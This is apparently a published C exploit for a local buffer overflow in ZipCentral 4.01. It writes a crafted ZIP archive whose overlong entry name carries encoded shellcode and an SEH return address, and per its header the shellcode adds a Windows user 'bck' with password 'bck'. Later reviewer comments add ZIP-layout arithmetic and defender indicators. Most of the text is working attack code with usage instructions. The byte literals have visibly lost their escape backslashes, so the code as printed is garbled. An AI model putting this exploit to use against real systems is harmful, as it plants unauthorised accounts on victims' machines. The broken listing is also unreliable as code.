
# Title : ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit
# Published : 2006-08-30
# Author : bratax


/*
ZipCentral 4.01 Exploit by bratax (http://www.bratax.be/)

Soooooo many thanks to BuzzDee and c0rrupt for helping me with all the
problems I encountered :) Wouldn't have finished this without you guys!

Greetz to everyone I like... (no, that doesn't include you turb00)!

******************************

Some technical info:
- the advisory describing this vulnerability is available here:
  http://secunia.com/secunia_research/2006-35/advisory
- using SEH to exploit this
- some code might look weird in this source (e.g. shellcode, offsets, ...);
  this is because a lot of the values are changed in memory, so use your favourite
  debugger to see the real values and code
- shellcode adds a windows user "bck" with password "bck" (thx metasploit)
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)

*/

#include <stdio.h>
#include <string.h>

// Payload bytes that main() copies into the oversized entry name (483 bytes are
// taken from this array; see the memcpy in main).  The values are mostly in the
// printable range 0x30-0x5a, consistent with an encoded/alphanumeric payload, and
// the author's header note says the real values are only visible in a debugger.
// NOTE(review): as printed here the literal has no backslashes ("x89x03..."),
// so each "xNN" is three ASCII characters rather than one byte.  This looks like
// a stripped "\x" escape from extraction; the 483-byte count in main() only
// makes sense for the escaped form, so verify against the original source before
// relying on any size arithmetic derived from this listing.
// Defender note: per the header comment the payload's effect is the creation of
// a local account, so a new local user appearing right after an archive tool
// opens a file is the host-level observable; the file-level indicator is the
// kilobyte-long entry name padded with repeated 0x41 bytes.
unsigned char scode[] =
"x89x03x59x89x05x8ax9bx98x98x98x4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x50x42x30x4bx58x45x34x4ex43x4bx48x4ex57"
"x45x30x4ax47x41x30x4fx4ex4bx58x4fx34x4ax31x4bx58"
"x4fx35x42x42x41x30x4bx4ex49x54x4bx48x46x43x4bx58"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x32x46x50x45x47x45x4ex4bx38"
"x4fx35x46x52x41x30x4bx4ex48x56x4bx38x4ex50x4bx44"
"x4bx38x4fx55x4ex51x41x50x4bx4ex4bx38x4ex51x4bx58"
"x41x50x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x33"
"x42x4cx46x46x4bx58x42x54x42x53x45x58x42x4cx4ax57"
"x4ex50x4bx58x42x34x4ex50x4bx58x42x57x4ex41x4dx4a"
"x4bx38x4ax36x4ax50x4bx4ex49x30x4bx48x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax56x4ex33x4fx35x41x33"
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx57"
"x42x55x4ax56x42x4fx4cx48x46x50x4fx35x4ax46x4ax49"
"x50x4fx4cx48x50x30x47x45x4fx4fx47x4ex43x56x4dx56"
"x46x46x50x42x45x46x4ax57x45x56x42x52x4fx42x43x36"
"x42x52x50x46x45x56x46x57x42x52x45x57x43x47x45x36"
"x44x47x42x42x44x46x43x56x4bx36x42x42x44x56x43x56"
"x4bx46x42x52x4fx42x41x34x46x44x46x34x42x32x48x42"
"x48x32x42x32x50x56x45x46x46x57x42x52x4ex36x4fx36"
"x43x46x41x56x4ex56x47x36x44x37x4fx46x45x37x42x37"
"x42x52x41x54x46x56x4dx36x49x36x50x36x49x56x43x37"
"x46x57x44x47x41x56x46x37x4fx56x44x47x43x57x42x52"
"x44x56x43x46x4bx46x42x32x4fx52x41x54x46x34x46x44"
"x42x30x5a";

// Fixed ZIP structures that main() writes around the two overflow buffers.
// The byte counts below assume each "xNN" token is one byte (i.e. a "\x"
// escape was stripped on extraction); as literally printed they are ASCII text.
// Because these are string arrays, sizeof() includes the NUL terminator and
// main() writes it too; in each case the terminator is exactly the last byte of
// the corresponding ZIP header, so the layout silently depends on it.
//
// Local file header (50 4B 03 04): CRC and sizes left zero, name length
// 0x0814 = 2068 = 657 + 1407 + 4, i.e. both overflow buffers plus ".txt".
// 29 data bytes + NUL = the 30-byte header; the NUL is the high byte of the
// extra-field length.
char head[] = "x50x4Bx03x04x14x00x00x00x00x00"
			 "xB7xACxCEx34x00x00x00x00x00x00"
			 "x00x00x00x00x00x00x14x08x00";
// ".txt" completes the first entry's name, then the central directory header
// (50 4B 01 02) repeats the 0x0814 name length and points at offset 0.
// 45 data bytes after ".txt" + NUL = the 46-byte header.
char middle[] = "x2ex74x78x74x50x4Bx01x02x14x00"
				"x14x00x00x00x00x00xB7xACxCEx34"
				"x00x00x00x00x00x00x00x00x00x00"
				"x00x00x14x08x00x00x00x00x00x00"
				"x01x00x24x00x00x00x00x00x00";
// ".txt" again completes the central-directory copy of the name, then the
// end-of-central-directory record (50 4B 05 06): one entry, directory size
// 0x0842 = 2114 = 46 + 2068, directory offset 0x0832 = 2098 = 30 + 2068.
// 21 data bytes after ".txt" + NUL = the 22-byte record (NUL = comment length
// high byte).
char tail[] = "x2ex74x78x74x50x4Bx05x06x00x00"
			 "x00x00x01x00x01x00x42x08x00x00"
			 "x32x08x00x00x00";

/*
 * Writes a single-entry ZIP archive to argv[1] whose entry name is 2068 bytes
 * long (the 657-byte and 1407-byte buffers below plus ".txt").  The name is
 * written twice, once in the local file header and once in the central
 * directory, as the ZIP format requires.
 *
 * argv[1] : output path; the usage text is printed and 0 returned when absent.
 * returns : always 0, including when fopen() fails (see the note at the end).
 *
 * NOTE(review): the string literals in this listing appear to have lost their
 * backslashes on extraction ("x82x6E...", "...n" instead of "\n"), so as
 * printed the sizes and bytes do not match the comments; treat the arithmetic
 * in the comments as describing the escaped form.
 */
int main(int argc,char *argv[])
{
	char overflow[657]; // first part of the entry name; 657 = 2 + 483 shellcode bytes + 168 filler + 4 address bytes
	char overflow2[1407]; // second part of the entry name
FILE *vuln;
if(argc == 1)
{
    printf("ZipCentral 4.01 Buffer Overflow Exploit.n");
    printf("Coded by bratax (http://www.bratax.be/).n");
    printf("Usage: %s <outputfile>n",argv[0]);
    return 0;
}
// NOTE(review): opened in text mode ("w"); for binary output "wb" is the
// portable choice, since text mode on Windows rewrites any 0x0A byte as 0D 0A.
// The result is only tested at the write step below, not here.
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x41,sizeof(overflow)); //fill with crap (0x41 filler for the whole 657 bytes)
memcpy(overflow+2, scode, 483); // our shellcode: occupies bytes 2..484, filler remains around it
memcpy(overflow+653, "x82x6ExECx98", 4); // jmp back to shellcode: the last 4 bytes (653..656) of the buffer
memset(overflow2, 0x42, sizeof(overflow2)); // more crap (0x42 filler for all 1407 bytes)
memcpy(overflow2+0,"x98x85x8Ex00", 4); // pop pop ret: first 4 bytes of the second buffer
// pop pop ret somewhere within 0x00xxxxFF.. needed because of 2 reasons
// which I'm not going to explain here right now..
// notice that 008E8598 will be changed in memory and will become 00C4E0FF
// this might be different on other machines, but will always be 00xxE0FF


if(vuln)
{
    //Write file
    // sizeof(head/middle/tail) includes each string's NUL terminator, and the
    // terminator is the last byte of the corresponding ZIP header, so the
    // layout depends on it; an explicit length constant would make that clear.
    // Return values of fwrite()/fclose() are not checked, so a short write or
    // a failed flush goes unnoticed.
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);   // name, part 1 (local header)
    fwrite(overflow2, 1, sizeof(overflow2), vuln); // name, part 2 (local header)
    fwrite(middle, 1, sizeof(middle), vuln);       // ".txt" + central directory header
    fwrite(overflow, 1, sizeof(overflow), vuln);   // name, part 1 (central directory)
    fwrite(overflow2, 1, sizeof(overflow2), vuln); // name, part 2 (central directory)
    fwrite(tail, 1, sizeof(tail), vuln);           // ".txt" + end-of-central-directory record
    fclose(vuln);
}
// NOTE(review): printed unconditionally, so the message is misleading when
// fopen() failed above; reporting the error (e.g. perror) and returning a
// non-zero status would be the correct behaviour on that path.
printf("File written.nOpen with ZipCentral 4.01 to exploit.n");
return 0;
}
